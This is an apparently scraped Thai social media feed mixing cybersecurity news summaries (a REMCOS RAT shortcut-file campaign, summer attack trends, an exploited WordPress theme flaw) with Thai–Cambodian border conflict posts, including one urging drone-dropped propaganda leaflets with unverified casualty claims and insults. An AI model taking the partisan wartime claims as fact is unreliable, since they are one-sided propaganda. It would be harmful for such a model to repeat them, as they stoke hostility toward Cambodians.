ซึ่งสามารถควบคุมคอมพิวเตอร์ได้เต็มรูปแบบ—ตั้งแต่ keylogging, เปิดกล้อง, ไปจนถึงการสร้าง shell ระยะไกล แคมเปญนี้ยังใช้เทคนิคหลบเลี่ยงการตรวจจับ เช่น ไม่ใช้ไฟล์บนดิสก์, ไม่ใช้ macro, และไม่แสดงคำเตือนใด ๆ ทำให้ผู้ใช้ทั่วไปแทบไม่รู้ตัวว่าโดนโจมตี ✅ แคมเปญมัลแวร์ใหม่ใช้ไฟล์ลัด Windows (.lnk) เป็นช่องทางติดตั้ง REMCOS RAT ➡️ ไฟล์ลัดปลอมเป็นเอกสารหรือโปรแกรม เช่น “ORDINE-DI-ACQUIST…” ➡️ เมื่อคลิกจะรัน PowerShell แบบลับ ๆ ✅ PowerShell ถูกใช้เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก ➡️ ไม่ใช้ไฟล์บนดิสก์หรือ macro ทำให้หลบการตรวจจับได้ ➡️ payload ถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ปลอมชื่อเป็น CHROME.PIF ✅ REMCOS RAT ให้ผู้โจมตีควบคุมระบบได้เต็มรูปแบบ ➡️ keylogging, เปิดกล้อง, สร้าง shell ระยะไกล, เข้าถึงไฟล์ ➡️ สร้าง log file ใน %ProgramData% เพื่อเก็บข้อมูลการกดแป้นพิมพ์ ✅ เซิร์ฟเวอร์ควบคุม (C2) ของแคมเปญนี้อยู่ในสหรัฐฯ และโรมาเนีย ➡️ แสดงให้เห็นว่าการโจมตีสามารถมาจากหลายประเทศ ➡️ ใช้โครงสร้างแบบกระจายเพื่อหลบการติดตาม ✅ ไฟล์ลัดไม่แสดงคำเตือน macro และสามารถหลอกผู้ใช้ได้ง่าย ➡️ Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น ➡️ ไฟล์ .lnk อาจดูเหมือน .pdf หรือ .docx. ‼️ ไฟล์ลัด (.lnk) สามารถรันคำสั่งอันตรายได้โดยไม่ต้องใช้ macro หรือไฟล์ .exe ⛔ ผู้ใช้มักเข้าใจผิดว่าเป็นไฟล์เอกสาร ⛔ ไม่มีการแจ้งเตือนจากระบบความปลอดภัยของ Office ‼️ REMCOS RAT สามารถทำงานแบบ fileless โดยไม่ทิ้งร่องรอยบนดิสก์ ⛔ ยากต่อการตรวจจับด้วย antivirus แบบดั้งเดิม ⛔ ต้องใช้ระบบป้องกันแบบ real-time และ behavioral analysis ‼️ การปลอมชื่อไฟล์และไอคอนทำให้ผู้ใช้หลงเชื่อว่าเป็นไฟล์จริง ⛔ Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น ⛔ ไฟล์ .lnk อาจดูเหมือน “Invoice.pdf” ทั้งที่เป็น shortcut ‼️ การเปิดไฟล์จากอีเมลหรือเครือข่ายที่ไม่ปลอดภัยอาจนำไปสู่การติดมัลแวร์ทันที ⛔ ไม่ควรเปิดไฟล์แนบจากผู้ส่งที่ไม่รู้จัก ⛔ ควรใช้ sandbox หรือระบบแยกเพื่อทดสอบไฟล์ก่อนเปิด https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/
    HACKREAD.COM
    New Attack Uses Windows Shortcut Files to Install REMCOS Backdoor
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 39 มุมมอง 0 รีวิว
  • กองทัพไทยยันข่าวปลอม! ปฏิเสธข่าวลืออพยพคนสุรินทร์ ย้ำยังคงหยุดยิงแต่พร้อมรับมือเขมร ยันปล่อย 18 เชลยเมื่อรบจบ ไม่ใช่แค่หยุดยิง จับชาวเขมรต้องสงสัยสอดแนมชายแดนไทย
    .
    อ่านเพิ่มเติม..https://sondhitalk.com/detail/9680000073614

    #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    กองทัพไทยยันข่าวปลอม! ปฏิเสธข่าวลืออพยพคนสุรินทร์ ย้ำยังคงหยุดยิงแต่พร้อมรับมือเขมร ยันปล่อย 18 เชลยเมื่อรบจบ ไม่ใช่แค่หยุดยิง จับชาวเขมรต้องสงสัยสอดแนมชายแดนไทย . อ่านเพิ่มเติม..https://sondhitalk.com/detail/9680000073614 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    3
    0 ความคิดเห็น 0 การแบ่งปัน 206 มุมมอง 0 รีวิว
  • #โดรนไทยแจกใบปลิวในเขมรบอกชาวเขมรว่าฮุนเซนทิ้งศพจนเน่าของทหารเขมรตายเป็นหมื่นศพ.
    #โดรนไทยทิ้งใบปลิวบอกชาวเขมรว่าฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ.

    #ฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ.

    ..สื่อไทยเราปั่นกระแสโหนกระแสมากๆเลยว่าฮุนเซนฮุนมาเนตทิ้งศพเขมรเป็นหมื่นๆศพเน่าคาชายแดน,หากเขมรเชื่อข่าวปลอมบิดเบือนแบบมาลีมันนักก็มีใครก็ได้สร้างคลิปทหารเขมรตายกว่าหมื่นศพแต่ฮุนเซนไม่มาเก็บศพให้ญาติทหารเขมรที่ตาย,โหนกระแสสร้างความเกียจชังแก่ฮุนเซนโดยชาวเขมรเลย,ถ้านายใหญ่ในไทยโทรสั่งบอกสื่ออย่าเล่นข่าวนี้แก่ฮุนเซนปกป้องฮุนเซนช่วยกูมากๆด้วยอย่าทำเครดิตฮุนเซนกูตกต่ำแบบนายใหญ่สั่งทหารไทยอย่าตอบโต้ทหารเขมรแบบนั้นล่ะ สื่อไทยเราโหนกระแสนี้ทุกๆวันเลย เช้า เที่ยง เย็น ดึกด้วย ,ให้พ่อมันแบบมาเลย์แบบอเมริกา ให้ชาวเขมรเรียกร้องอเมริกาช่วยฮุนเซนฮุนมาเน็ตนำทหารมาเลย์นำทหารอเมริกามาเก็บกู้ซากศพทหารเขมรให้ญาติทหารเขมรไปประกอบพิธีทางศาสนาด้วยเพื่อความเป็นมนุษยธรรมนั้นล่ะเป็นคนกลางแล้วมาช่วยเจรจาสงบศึกหยุดยิงด้วย,บุกดงกับระเบิดที่ทหารเขมรวางเองช่วยไปเก็บกู้ซากศพทหารเขมรให้ประชาชนชาวเขมรด้วย.

    ใช้โดรนเราทิ้งใบปลิวเป็นภาษาเขมรว่า ฮุนเซนฮุนมาเซนทิ้งศพทหารญาติของทหารเขมรกว่าหมื่นศพทั่วหมู่บ้านเขมรที่โดรนเราบินกลับไปถึงชาวบ้านมันได้,บินไปชุมชนเมืองใหญ่ๆมันด้วยเลย,เหยียบหยามว่าโดรนไทยก็มาถึงถิ่นมรึงได้,บวกทิ้งโปรยข่าวด้วยมืออีกว่ามรึง!!ฮุนเซนและฮุนมาเนตทิ้งศพทหารเขมรจนเน่าคาป่าไม่เก็บกู้ให้เกียรติทหารเขมรที่ตายและญาติของทหารไร้มนุษยธรรมขาดภาวะผู้นำทัพที่ดีอัดท้ายใบปลิวข่าวเป็นภาษาเขมรกับฮุนเซนมีมันส์กับนางมาลีแทนเมียหลวงมันอีก,ได้บันเทิงแน่นอน,ปิดทางเน็ตได้แต่ปิดทางตีนทางมือทำเองพื้นๆไม่ได้แน่นอน,ประชาชนติดพรมแดนเอาโดนบินไปฝั่งมันก็น่าจะได้นะ ทหารไทยเราไม่สะดวกก็จัดแทนเลย,ทหารไทยเราอย่าตั้งรับอย่างเดียว,มุกนี้ทำลายขวัญกำลังใจมันสดๆร้อนๆได้.กลยุทธทางทหารอีกมุม,เหี้ยให้มันบินโดรนมาก่อกวนเราฝ่ายเดียวทำไม,บินโดรนแบบนี้ทิ้งบอกว่าฮุนเซนทิ้งศพทหารเป็นหมื่นไปเลย.

    https://youtube.com/watch?v=BdOokE0rHO8&si=HNQv1Khb3rKHzwU-
    #โดรนไทยแจกใบปลิวในเขมรบอกชาวเขมรว่าฮุนเซนทิ้งศพจนเน่าของทหารเขมรตายเป็นหมื่นศพ. #โดรนไทยทิ้งใบปลิวบอกชาวเขมรว่าฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ. #ฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ. ..สื่อไทยเราปั่นกระแสโหนกระแสมากๆเลยว่าฮุนเซนฮุนมาเนตทิ้งศพเขมรเป็นหมื่นๆศพเน่าคาชายแดน,หากเขมรเชื่อข่าวปลอมบิดเบือนแบบมาลีมันนักก็มีใครก็ได้สร้างคลิปทหารเขมรตายกว่าหมื่นศพแต่ฮุนเซนไม่มาเก็บศพให้ญาติทหารเขมรที่ตาย,โหนกระแสสร้างความเกียจชังแก่ฮุนเซนโดยชาวเขมรเลย,ถ้านายใหญ่ในไทยโทรสั่งบอกสื่ออย่าเล่นข่าวนี้แก่ฮุนเซนปกป้องฮุนเซนช่วยกูมากๆด้วยอย่าทำเครดิตฮุนเซนกูตกต่ำแบบนายใหญ่สั่งทหารไทยอย่าตอบโต้ทหารเขมรแบบนั้นล่ะ สื่อไทยเราโหนกระแสนี้ทุกๆวันเลย เช้า เที่ยง เย็น ดึกด้วย ,ให้พ่อมันแบบมาเลย์แบบอเมริกา ให้ชาวเขมรเรียกร้องอเมริกาช่วยฮุนเซนฮุนมาเน็ตนำทหารมาเลย์นำทหารอเมริกามาเก็บกู้ซากศพทหารเขมรให้ญาติทหารเขมรไปประกอบพิธีทางศาสนาด้วยเพื่อความเป็นมนุษยธรรมนั้นล่ะเป็นคนกลางแล้วมาช่วยเจรจาสงบศึกหยุดยิงด้วย,บุกดงกับระเบิดที่ทหารเขมรวางเองช่วยไปเก็บกู้ซากศพทหารเขมรให้ประชาชนชาวเขมรด้วย. ใช้โดรนเราทิ้งใบปลิวเป็นภาษาเขมรว่า ฮุนเซนฮุนมาเซนทิ้งศพทหารญาติของทหารเขมรกว่าหมื่นศพทั่วหมู่บ้านเขมรที่โดรนเราบินกลับไปถึงชาวบ้านมันได้,บินไปชุมชนเมืองใหญ่ๆมันด้วยเลย,เหยียบหยามว่าโดรนไทยก็มาถึงถิ่นมรึงได้,บวกทิ้งโปรยข่าวด้วยมืออีกว่ามรึง!!ฮุนเซนและฮุนมาเนตทิ้งศพทหารเขมรจนเน่าคาป่าไม่เก็บกู้ให้เกียรติทหารเขมรที่ตายและญาติของทหารไร้มนุษยธรรมขาดภาวะผู้นำทัพที่ดีอัดท้ายใบปลิวข่าวเป็นภาษาเขมรกับฮุนเซนมีมันส์กับนางมาลีแทนเมียหลวงมันอีก,ได้บันเทิงแน่นอน,ปิดทางเน็ตได้แต่ปิดทางตีนทางมือทำเองพื้นๆไม่ได้แน่นอน,ประชาชนติดพรมแดนเอาโดนบินไปฝั่งมันก็น่าจะได้นะ ทหารไทยเราไม่สะดวกก็จัดแทนเลย,ทหารไทยเราอย่าตั้งรับอย่างเดียว,มุกนี้ทำลายขวัญกำลังใจมันสดๆร้อนๆได้.กลยุทธทางทหารอีกมุม,เหี้ยให้มันบินโดรนมาก่อกวนเราฝ่ายเดียวทำไม,บินโดรนแบบนี้ทิ้งบอกว่าฮุนเซนทิ้งศพทหารเป็นหมื่นไปเลย. https://youtube.com/watch?v=BdOokE0rHO8&si=HNQv1Khb3rKHzwU-
    0 ความคิดเห็น 0 การแบ่งปัน 75 มุมมอง 0 รีวิว
  • โรงงานเฟกนิวส์! ผู้ใช้โซเชียลมีเดียชาวกัมพูชายังคงผลิตข่าวปลอมออกมาต่อเนื่อง ล่าสุดปั้นน้ำอ้างทหารตายเพราะโดนแก๊สพิษจากไทย

    อ่านต่อ..https://news1live.com/detail/9680000073215

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire


    โรงงานเฟกนิวส์! ผู้ใช้โซเชียลมีเดียชาวกัมพูชายังคงผลิตข่าวปลอมออกมาต่อเนื่อง ล่าสุดปั้นน้ำอ้างทหารตายเพราะโดนแก๊สพิษจากไทย อ่านต่อ..https://news1live.com/detail/9680000073215 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    Haha
    2
    1 ความคิดเห็น 0 การแบ่งปัน 361 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: ฤดูร้อน—ช่วงเวลาทองของแฮกเกอร์ และบทเรียนที่องค์กรต้องไม่ละเลย

    ฤดูร้อนมักเป็นช่วงที่คนทำงานหยุดพัก เดินทางไกล หรือทำงานจากสถานที่ที่ไม่คุ้นเคย เช่น บ้านพักตากอากาศ โรงแรม หรือสนามบิน ซึ่งมักใช้ Wi-Fi สาธารณะที่ไม่มีการเข้ารหัสหรือระบบป้องกันที่ดีพอ

    ในขณะเดียวกัน ทีม IT และฝ่ายรักษาความปลอดภัยไซเบอร์ขององค์กรก็ลดกำลังลงจากการลาพักร้อน ทำให้การตรวจสอบภัยคุกคามลดลงอย่างเห็นได้ชัด

    ผลคือ แฮกเกอร์ใช้โอกาสนี้ในการโจมตีแบบ phishing, ransomware และการขโมยข้อมูลผ่านเครือข่ายปลอม โดยเฉพาะการปลอมอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก ซึ่งดูเหมือนจริงจนผู้ใช้หลงเชื่อ

    ข้อมูลจากหลายแหล่งระบุว่า การโจมตีไซเบอร์ในฤดูร้อนเพิ่มขึ้นเฉลี่ย 30% โดยเฉพาะในกลุ่มองค์กรที่มีการทำงานแบบ remote และไม่มีนโยบายรักษาความปลอดภัยที่ชัดเจน

    ฤดูร้อนเป็นช่วงที่การโจมตีไซเบอร์เพิ่มขึ้นอย่างมีนัยสำคัญ
    การโจมตีเพิ่มขึ้นเฉลี่ย 30% ในช่วงเดือนมิถุนายน–สิงหาคม
    เกิดจากการลดกำลังของทีม IT และการใช้เครือข่ายที่ไม่ปลอดภัย

    ผู้ใช้มักเชื่อมต่อ Wi-Fi สาธารณะจากโรงแรม สนามบิน หรือบ้านพัก โดยไม่รู้ว่ามีความเสี่ยง
    เสี่ยงต่อการถูกดักข้อมูลหรือปลอมเครือข่าย
    อุปกรณ์ส่วนตัวมักไม่มีระบบป้องกันเท่ากับอุปกรณ์องค์กร

    แฮกเกอร์ใช้ phishing ที่เลียนแบบอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก
    หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตหรือรหัสผ่าน
    ใช้เทคนิคที่เหมือนจริงมากขึ้นด้วย generative AI

    องค์กรมักเลื่อนการอัปเดตระบบและการตรวจสอบความปลอดภัยไปหลังช่วงพักร้อน
    ทำให้เกิดช่องโหว่ที่แฮกเกอร์สามารถเจาะเข้าได้ง่าย
    ไม่มีการสำรองข้อมูลหรือทดสอบระบบอย่างสม่ำเสมอ

    ภัยคุกคามที่พบบ่อยในฤดูร้อน ได้แก่ ransomware, credential theft และ shadow IT
    การใช้แอปที่ไม่ได้รับอนุญาตหรือแชร์ไฟล์ผ่านช่องทางที่ไม่ปลอดภัย
    การขโมยข้อมูลบัญชีผ่านการดักจับการสื่อสาร

    การใช้อุปกรณ์ส่วนตัวที่ไม่มีระบบป้องกันเข้าถึงข้อมูลองค์กรเป็นช่องโหว่สำคัญ
    ไม่มีการเข้ารหัสหรือระบบป้องกันไวรัส
    เสี่ยงต่อการถูกขโมยข้อมูลหรือเข้าถึงระบบภายใน

    การลดกำลังทีม IT ในช่วงฤดูร้อนทำให้การตอบสนองต่อภัยคุกคามล่าช้า
    แฮกเกอร์สามารถแฝงตัวในระบบได้นานขึ้น
    อาจเกิดการโจมตีแบบ ransomware โดยไม่มีใครตรวจพบ

    การไม่มีแผนรับมือหรือผู้รับผิดชอบเมื่อเกิดเหตุการณ์ไซเบอร์อาจทำให้ความเสียหายขยายตัว
    ไม่มีการแจ้งเตือนหรือกู้คืนข้อมูลทันเวลา
    องค์กรอาจสูญเสียข้อมูลสำคัญหรือความน่าเชื่อถือ

    การใช้ Wi-Fi สาธารณะโดยไม่ใช้ VPN หรือระบบป้องกันเป็นพฤติกรรมเสี่ยงสูง
    ข้อมูลส่วนตัวและข้อมูลองค์กรอาจถูกดักจับ
    เสี่ยงต่อการถูกโจมตีแบบ man-in-the-middle

    https://www.csoonline.com/article/4030931/summer-why-cybersecurity-needs-to-be-further-strengthened.html
    🎙️ เรื่องเล่าจากข่าว: ฤดูร้อน—ช่วงเวลาทองของแฮกเกอร์ และบทเรียนที่องค์กรต้องไม่ละเลย ฤดูร้อนมักเป็นช่วงที่คนทำงานหยุดพัก เดินทางไกล หรือทำงานจากสถานที่ที่ไม่คุ้นเคย เช่น บ้านพักตากอากาศ โรงแรม หรือสนามบิน ซึ่งมักใช้ Wi-Fi สาธารณะที่ไม่มีการเข้ารหัสหรือระบบป้องกันที่ดีพอ ในขณะเดียวกัน ทีม IT และฝ่ายรักษาความปลอดภัยไซเบอร์ขององค์กรก็ลดกำลังลงจากการลาพักร้อน ทำให้การตรวจสอบภัยคุกคามลดลงอย่างเห็นได้ชัด ผลคือ แฮกเกอร์ใช้โอกาสนี้ในการโจมตีแบบ phishing, ransomware และการขโมยข้อมูลผ่านเครือข่ายปลอม โดยเฉพาะการปลอมอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก ซึ่งดูเหมือนจริงจนผู้ใช้หลงเชื่อ ข้อมูลจากหลายแหล่งระบุว่า การโจมตีไซเบอร์ในฤดูร้อนเพิ่มขึ้นเฉลี่ย 30% โดยเฉพาะในกลุ่มองค์กรที่มีการทำงานแบบ remote และไม่มีนโยบายรักษาความปลอดภัยที่ชัดเจน ✅ ฤดูร้อนเป็นช่วงที่การโจมตีไซเบอร์เพิ่มขึ้นอย่างมีนัยสำคัญ ➡️ การโจมตีเพิ่มขึ้นเฉลี่ย 30% ในช่วงเดือนมิถุนายน–สิงหาคม ➡️ เกิดจากการลดกำลังของทีม IT และการใช้เครือข่ายที่ไม่ปลอดภัย ✅ ผู้ใช้มักเชื่อมต่อ Wi-Fi สาธารณะจากโรงแรม สนามบิน หรือบ้านพัก โดยไม่รู้ว่ามีความเสี่ยง ➡️ เสี่ยงต่อการถูกดักข้อมูลหรือปลอมเครือข่าย ➡️ อุปกรณ์ส่วนตัวมักไม่มีระบบป้องกันเท่ากับอุปกรณ์องค์กร ✅ แฮกเกอร์ใช้ phishing ที่เลียนแบบอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก ➡️ หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตหรือรหัสผ่าน ➡️ ใช้เทคนิคที่เหมือนจริงมากขึ้นด้วย generative AI ✅ องค์กรมักเลื่อนการอัปเดตระบบและการตรวจสอบความปลอดภัยไปหลังช่วงพักร้อน ➡️ ทำให้เกิดช่องโหว่ที่แฮกเกอร์สามารถเจาะเข้าได้ง่าย ➡️ ไม่มีการสำรองข้อมูลหรือทดสอบระบบอย่างสม่ำเสมอ ✅ ภัยคุกคามที่พบบ่อยในฤดูร้อน ได้แก่ ransomware, credential theft และ shadow IT ➡️ การใช้แอปที่ไม่ได้รับอนุญาตหรือแชร์ไฟล์ผ่านช่องทางที่ไม่ปลอดภัย ➡️ การขโมยข้อมูลบัญชีผ่านการดักจับการสื่อสาร ‼️ การใช้อุปกรณ์ส่วนตัวที่ไม่มีระบบป้องกันเข้าถึงข้อมูลองค์กรเป็นช่องโหว่สำคัญ ⛔ ไม่มีการเข้ารหัสหรือระบบป้องกันไวรัส ⛔ เสี่ยงต่อการถูกขโมยข้อมูลหรือเข้าถึงระบบภายใน ‼️ การลดกำลังทีม IT ในช่วงฤดูร้อนทำให้การตอบสนองต่อภัยคุกคามล่าช้า ⛔ แฮกเกอร์สามารถแฝงตัวในระบบได้นานขึ้น ⛔ อาจเกิดการโจมตีแบบ ransomware โดยไม่มีใครตรวจพบ ‼️ การไม่มีแผนรับมือหรือผู้รับผิดชอบเมื่อเกิดเหตุการณ์ไซเบอร์อาจทำให้ความเสียหายขยายตัว ⛔ ไม่มีการแจ้งเตือนหรือกู้คืนข้อมูลทันเวลา ⛔ องค์กรอาจสูญเสียข้อมูลสำคัญหรือความน่าเชื่อถือ ‼️ การใช้ Wi-Fi สาธารณะโดยไม่ใช้ VPN หรือระบบป้องกันเป็นพฤติกรรมเสี่ยงสูง ⛔ ข้อมูลส่วนตัวและข้อมูลองค์กรอาจถูกดักจับ ⛔ เสี่ยงต่อการถูกโจมตีแบบ man-in-the-middle https://www.csoonline.com/article/4030931/summer-why-cybersecurity-needs-to-be-further-strengthened.html
    WWW.CSOONLINE.COM
    Summer: Why cybersecurity must be strengthened as vacations abound
    Letting your guard down is not the most reasonable thing to do at a time when cybersecurity risks are on the rise; cyber attackers are not resting. What's more, they are well aware of what happens at this time of year, hence they take advantage of the circumstance to launch more aggressive campaigns.
    0 ความคิดเห็น 0 การแบ่งปัน 92 มุมมอง 0 รีวิว
  • ทูต ทหาร และสื่อต่างประเทศ รับทราบข้อเท็จจริงกรณีสถานการณ์แนวชายแดนไทย-กัมพูชา
    https://www.thai-tai.tv/news/20705/
    .
    #ไทยไท #ชายแดนไทยกัมพูชา #อุบลราชธานี #ความโปร่งใส #ทูตนานาชาติ #กองทัพไทย #ข่าวปลอม #การป้องกันตนเอง #ความสูญเสีย #อพยพ
    ทูต ทหาร และสื่อต่างประเทศ รับทราบข้อเท็จจริงกรณีสถานการณ์แนวชายแดนไทย-กัมพูชา https://www.thai-tai.tv/news/20705/ . #ไทยไท #ชายแดนไทยกัมพูชา #อุบลราชธานี #ความโปร่งใส #ทูตนานาชาติ #กองทัพไทย #ข่าวปลอม #การป้องกันตนเอง #ความสูญเสีย #อพยพ
    0 ความคิดเห็น 0 การแบ่งปัน 85 มุมมอง 0 รีวิว
  • ♣ เขมรปั่นข่าวปลอมระงับขายกริพเพน ส่วนหุ้นบริษัทผู้ผลิตพุ่งหลังไทยรีวิวคุณภาพเป็นเจ้าแรก ทรงนี้มีแต่จะเพิ่มจำนวนฝูงบินนะเหม
    #7ดอกจิก
    ♣ เขมรปั่นข่าวปลอมระงับขายกริพเพน ส่วนหุ้นบริษัทผู้ผลิตพุ่งหลังไทยรีวิวคุณภาพเป็นเจ้าแรก ทรงนี้มีแต่จะเพิ่มจำนวนฝูงบินนะเหม #7ดอกจิก
    0 ความคิดเห็น 0 การแบ่งปัน 100 มุมมอง 0 รีวิว
  • เปิดหลักฐานชุดใหญ่! โฆษกรัฐบาลยันไทยใช้สิทธิป้องกันตนเอง กัมพูชาป่วนชายแดน พุ่งเป้า โจมตี"พลเรือน" - บิดเบือนข้อมูล
    https://www.thai-tai.tv/news/20685/
    .
    #ไทยไท #ThailandFactMission #TruthfromThailand #สถานการณ์ไทยกัมพูชา #กองทัพไทย #ชายแดนไทยกัมพูชา #ความขัดแย้งชายแดน #กฎหมายระหว่างประเทศ #ข่าวปลอม
    เปิดหลักฐานชุดใหญ่! โฆษกรัฐบาลยันไทยใช้สิทธิป้องกันตนเอง กัมพูชาป่วนชายแดน พุ่งเป้า โจมตี"พลเรือน" - บิดเบือนข้อมูล https://www.thai-tai.tv/news/20685/ . #ไทยไท #ThailandFactMission #TruthfromThailand #สถานการณ์ไทยกัมพูชา #กองทัพไทย #ชายแดนไทยกัมพูชา #ความขัดแย้งชายแดน #กฎหมายระหว่างประเทศ #ข่าวปลอม
    0 ความคิดเห็น 0 การแบ่งปัน 98 มุมมอง 0 รีวิว
  • ผบก.สอท.1 เร่งประสาน กระทรวงดีอี ปิดกั้นข่าวปลอมจากสื่อโซเชี่ยลกัมพูชา สร้างความสับสน แนะคนไทยติดตามข่าวสารจากเพจทางการเท่านั้น

    อ่านต่อ..https://news1live.com/detail/9680000072781

    #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    ผบก.สอท.1 เร่งประสาน กระทรวงดีอี ปิดกั้นข่าวปลอมจากสื่อโซเชี่ยลกัมพูชา สร้างความสับสน แนะคนไทยติดตามข่าวสารจากเพจทางการเท่านั้น อ่านต่อ..https://news1live.com/detail/9680000072781 #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    3
    0 ความคิดเห็น 0 การแบ่งปัน 348 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: ธีม WordPress “Alone” ถูกเจาะทะลุ—เปิดทางให้แฮกเกอร์ยึดเว็บแบบเงียบ ๆ

    ธีม Alone – Charity Multipurpose Non-profit ซึ่งถูกใช้ในเว็บไซต์องค์กรการกุศลกว่า 200 แห่งทั่วโลก ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ที่เปิดให้ผู้ไม่ประสงค์ดีสามารถอัปโหลดไฟล์ ZIP ที่มี backdoor PHP เพื่อรันคำสั่งจากระยะไกล และสร้างบัญชีผู้ดูแลระบบปลอมได้ทันที

    ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ซึ่งเพิ่งได้รับการแก้ไขเมื่อวันที่ 16 มิถุนายน 2025 แต่การโจมตีเริ่มขึ้นตั้งแต่วันที่ 12 กรกฎาคม ก่อนที่ช่องโหว่จะถูกเปิดเผยต่อสาธารณะเพียง 2 วัน โดย Wordfence รายงานว่ามีความพยายามโจมตีมากกว่า 120,000 ครั้งแล้วจากหลาย IP ทั่วโลก

    แฮกเกอร์ใช้ช่องโหว่นี้เพื่อ:
    - สร้างบัญชีแอดมินปลอม
    - อัปโหลดมัลแวร์
    - เปลี่ยนเส้นทางผู้เยี่ยมชมไปยังเว็บฟิชชิ่ง
    - ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์อื่น

    ธีม Alone – Charity Multipurpose ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394
    คะแนนความรุนแรง 9.8/10
    เปิดทางให้แฮกเกอร์อัปโหลดไฟล์และรันคำสั่งจากระยะไกล

    ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5
    เวอร์ชันที่ปลอดภัยคือ 7.8.5 ขึ้นไป
    ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี

    Wordfence รายงานว่ามีการโจมตีมากกว่า 120,000 ครั้งแล้ว
    เริ่มโจมตีตั้งแต่วันที่ 12 กรกฎาคม 2025
    ใช้ไฟล์ ZIP ที่มี backdoor เช่น wp-classic-editor.zip

    แฮกเกอร์สามารถสร้างบัญชีแอดมินปลอมและควบคุมเว็บไซต์ได้เต็มรูปแบบ
    ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์หรือ redirect ไปยังเว็บอันตราย
    อาจส่งผลต่อชื่อเสียงและข้อมูลผู้ใช้งาน

    ธีมนี้ถูกใช้ในเว็บไซต์องค์กรการกุศลและ NGO กว่า 200 แห่งทั่วโลก
    มีฟีเจอร์ donation integration และรองรับ Elementor/WPBakery
    เป็นธีมเชิงพาณิชย์ที่ได้รับความนิยมในกลุ่มไม่แสวงหากำไร

    หากยังใช้เวอร์ชันก่อน 7.8.5 เว็บไซต์ของคุณเสี่ยงต่อการถูกยึดครองทันที
    ช่องโหว่เปิดให้ผู้ไม่ประสงค์ดีเข้าถึงระบบโดยไม่ต้องล็อกอิน
    อาจถูกใช้เป็นฐานปล่อยมัลแวร์หรือขโมยข้อมูลผู้ใช้

    การโจมตีเกิดขึ้นก่อนการเปิดเผยช่องโหว่ต่อสาธารณะ
    แสดงว่าแฮกเกอร์ติดตามการเปลี่ยนแปลงโค้ดอย่างใกล้ชิด
    อาจมีการโจมตีแบบ zero-day ในธีมอื่น ๆ อีก

    ผู้ดูแลเว็บไซต์อาจไม่รู้ว่าถูกเจาะ เพราะมัลแวร์ถูกซ่อนไว้อย่างแนบเนียน
    เช่น การสร้างผู้ใช้ชื่อ “officialwp” หรือการซ่อนไฟล์ใน mu-plugins
    ต้องตรวจสอบ log และผู้ใช้แอดมินอย่างละเอียด

    การใช้ธีมและปลั๊กอินจากแหล่งที่ไม่ปลอดภัยเพิ่มความเสี่ยงอย่างมาก
    ธีมเชิงพาณิชย์ที่ไม่มีการอัปเดตสม่ำเสมออาจมีช่องโหว่
    ควรใช้ธีมที่ได้รับการตรวจสอบจากผู้เชี่ยวชาญด้านความปลอดภัย

    https://www.techradar.com/pro/security/hackers-target-critical-wordpress-theme-flaw-thousands-of-sites-at-risk-from-potential-takeover-find-out-if-youre-affected
